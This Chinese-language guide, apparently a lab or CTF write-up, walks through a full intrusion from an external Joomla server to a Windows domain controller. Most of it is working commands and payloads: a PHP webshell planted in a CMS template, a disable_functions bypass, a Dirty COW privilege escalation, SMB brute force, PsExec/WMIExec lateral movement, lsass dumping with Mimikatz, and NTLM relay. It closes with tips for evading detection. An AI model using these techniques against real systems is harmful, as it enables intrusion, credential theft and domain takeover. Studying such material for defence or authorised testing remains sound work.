域渗透从打点到内网完整技术指南<\/h1>

一、环境概述<\/h2>

本次渗透测试涉及以下主机环境：<\/p>

攻击机<\/strong>：Kali Linux (172.20.10.3)<\/li>

目标网络<\/strong>：

Web服务器（CentOS）：外网172.20.10.3，内网192.168.93.100<\/li>
内网主机：

Ubuntu服务器：192.168.93.12<\/li>
Windows 7：192.168.93.30<\/li>
Windows Server 2008：192.168.93.20<\/li>
Windows Server 2012（域控）：192.168.93.10<\/li> <\/ul> <\/li>
域环境：TEST域<\/li> <\/ul> <\/li> <\/ul>
二、外网渗透阶段<\/h2>
1. 信息收集<\/h3>
工具使用<\/strong>：<\/p>

使用fscan<\/code>进行快速扫描： fscan -h 172.20.10.3 <\/code><\/pre> <\/li> <\/ul> 发现成果<\/strong>：<\/p> MySQL服务：root\/123<\/li> Web目录：http:\/\/172.20.10.3<\/li> Joomla CMS框架识别<\/li> <\/ul> 2. Joomla漏洞利用<\/h3> 工具使用<\/strong>：<\/p> Joomla扫描工具： git clone https:\/\/github.com\/OWASP\/joomscan perl joomscan.pl -u http:\/\/172.20.10.3 <\/code><\/pre> <\/li> <\/ul> 关键发现<\/strong>：<\/p> 后台管理地址： http:\/\/172.20.10.3\/joomla\/administrator\/<\/li> http:\/\/172.20.10.3\/administrator\/<\/li> <\/ul> <\/li> <\/ul> 密码重置技术<\/strong>：<\/p> 通过MySQL访问Joomla数据库：<\/p> mysql -u root -p123 -h 172.20.10.3 use joomla_db; update jos_users set password=md5('112233') where username='administrator'; <\/code><\/pre> <\/li> 成功登录后台：administrator\/112233<\/p> <\/li> <\/ol> 3. 通过Joomla后台获取Webshell<\/h3> 技术实现<\/strong>：<\/p> 定位模板文件：\/templates\/beez3\/index.php<\/code><\/li> 插入PHP webshell代码： <?<\/span>php<\/span> system<\/span>($_GET['cmd'<\/span>]); ?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 访问webshell： http:\/\/172.20.10.3\/templates\/beez3\/shell.php?cmd=id <\/code><\/pre> <\/li> <\/ol> 绕过disable_functions限制<\/strong>：<\/p> 使用LD_PRELOAD技术绕过： <?<\/span>php<\/span> <\/span><\/span>$cmd =<\/span> $_GET['cmd'<\/span>]; <\/span><\/span>$evil_func =<\/span> create_function<\/span>(''<\/span>, $cmd); <\/span><\/span>$evil_func(); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> 4. 提权与内网入口<\/h3> 获取SSH凭证<\/strong>：<\/p> 从数据库发现：wwwuser\/wwwuser_123Aqx<\/li> SSH连接： ssh -oHostKeyAlgorithms=+ssh-rsa wwwuser@172.20.10.3 <\/code><\/pre> <\/li> <\/ul> 脏牛(Dirty COW)提权<\/strong>：<\/p> 检查内核版本： uname -a <\/code><\/pre> <\/li> 下载利用代码： wget https:\/\/www.exploit-db.com\/download\/40839 -O dirty.c <\/code><\/pre> <\/li> 编译执行： gcc -pthread dirty.c -o dirty -lcrypt .\/dirty <\/code><\/pre> <\/li> 获取root权限密码：firefart<\/code><\/li> <\/ol> 三、内网渗透阶段<\/h2> 1. 内网信息收集<\/h3> MSF路由设置<\/strong>：<\/p> run autoroute -s 192.168.93.0\/24 background <\/code><\/pre> 内网扫描<\/strong>：<\/p> use auxiliary\/scanner\/smb\/smb_version set RHOSTS 192.168.93.0\/24 run <\/code><\/pre> 发现成果<\/strong>：<\/p> 存活主机：192.168.93.10\/20\/30<\/li> 域环境：TEST域<\/li> <\/ul> 2. 横向移动技术<\/h3> 方法一：SMB密码爆破与利用<\/h4> SMB爆破<\/strong>：<\/p> use auxiliary\/scanner\/smb\/smb_login set RHOSTS 192.168.93.20,192.168.93.30 set USER_FILE \/usr\/share\/wordlists\/common_users.txt set PASS_FILE \/usr\/share\/wordlists\/common_passwords.txt run <\/code><\/pre> 成功凭证<\/strong>：<\/p> administrator\/123qwe!ASD<\/li> <\/ul> PsExec利用<\/strong>：<\/p> use exploit\/windows\/smb\/psexec set RHOST 192.168.93.20 set SMBUser administrator set SMBPass 123qwe!ASD run <\/code><\/pre> 方法二：WMIExec利用<\/h4> 工具准备<\/strong>：<\/p> git clone https:\/\/github.com\/CoreSecurity\/impacket cd impacket\/examples pip install . <\/code><\/pre> 代理配置<\/strong>：<\/p> vi \/etc\/proxychains.conf # 添加：socks5 192.168.1.104 50002 aaa Aaa <\/code><\/pre> WMIExec连接<\/strong>：<\/p> proxychains4 python3 wmiexec.py -debug 'administrator:123qwe!ASD@192.168.93.20' <\/code><\/pre> 3. 域控定位与凭证获取<\/h3> 域控识别命令<\/strong>：<\/p> nltest \/DCLIST:TEST nslookup -type=SRV _ldap._tcp net time \/domain net group "Domain Controllers" \/domain netdom query pdc <\/code><\/pre> 凭证获取技术<\/strong>：<\/p> 方法一：Procdump+Mimikatz<\/strong><\/p> 下载Procdump： wget https:\/\/download.sysinternals.com\/files\/Procdump.zip <\/code><\/pre> <\/li> 转储lsass： Procdump.exe -accepteula -ma lsass.exe lsass.dmp <\/code><\/pre> <\/li> 使用Mimikatz分析： mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit" <\/code><\/pre> <\/li> <\/ol> 方法二：直接Mimikatz<\/strong><\/p> mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log <\/code><\/pre> 获取域管凭证<\/strong>：<\/p> administrator:zxcASDqw123!!<\/li> <\/ul> 连接域控<\/strong>：<\/p> proxychains4 python3 wmiexec.py -debug 'administrator:zxcASDqw123!!@192.168.93.10' <\/code><\/pre> 4. NTLM Relay攻击<\/h3> 工具准备<\/strong>：<\/p> git clone https:\/\/github.com\/lgandx\/Responder cd Responder-2.3.3.0 <\/code><\/pre> SMB签名扫描<\/strong>：<\/p> python tools\/RunFinger.py -i 192.168.93.0\/24 <\/code><\/pre> MultiRelay设置<\/strong>：<\/p> python tools\/MultiRelay.py -t 192.168.93.30 -u ALL <\/code><\/pre> Responder监听<\/strong>：<\/p> python Responder.py -I eth0 <\/code><\/pre> 触发NTLM认证<\/strong>：<\/p> MSSQL触发： EXEC<\/span> master.sys.xp_dirtree '\\192.168.93.100\simblog.txt'<\/span>,0<\/span>,1<\/span>; <\/span><\/span><\/code><\/pre><\/li> MSF模块触发： use auxiliary\/admin\/mssql\/mssql_ntlm_stealer set RHOST 192.168.93.20 set RPORT 1433 set USERNAME testuser set PASSWORD cvcvgjASD!@ run <\/code><\/pre> <\/li> <\/ol> 四、技术总结<\/h2> 关键学习点<\/h3> CMS漏洞利用<\/strong>：<\/p> Joomla版本识别与漏洞利用<\/li> 通过数据库修改后台密码<\/li> 模板文件写入webshell技术<\/li> <\/ul> <\/li> Linux提权<\/strong>：<\/p> 脏牛(Dirty COW)内核提权<\/li> SSH算法兼容性处理<\/li> <\/ul> <\/li> 内网穿透<\/strong>：<\/p> MSF路由配置<\/li> Proxychains代理配置<\/li> <\/ul> <\/li> 横向移动<\/strong>：<\/p> SMB密码爆破技术<\/li> PsExec与WMIExec利用<\/li> 域环境信息收集技术<\/li> <\/ul> <\/li> 凭证获取<\/strong>：<\/p> Procdump内存转储<\/li> Mimikatz多种使用方式<\/li> NTLM Relay攻击链<\/li> <\/ul> <\/li> <\/ol> 优化建议<\/h3> 工具选择<\/strong>：<\/p> 针对Linux目标，优先使用MSF而非Cobalt Strike<\/li> 考虑使用Chisel等更稳定的隧道工具<\/li> <\/ul> <\/li> 隐蔽性提升<\/strong>：<\/p> 使用更隐蔽的webshell插入方式<\/li> 考虑使用内存加载Mimikatz避免文件落地<\/li> <\/ul> <\/li> 自动化程度<\/strong>：<\/p> 可结合BloodHound进行自动化域环境分析<\/li> 使用CrackMapExec进行自动化横向移动<\/li> <\/ul> <\/li> <\/ol> 本指南详细记录了从外网打点到内网域渗透的完整过程，涵盖了主流的内网渗透技术，可作为红队操作的参考手册。<\/p>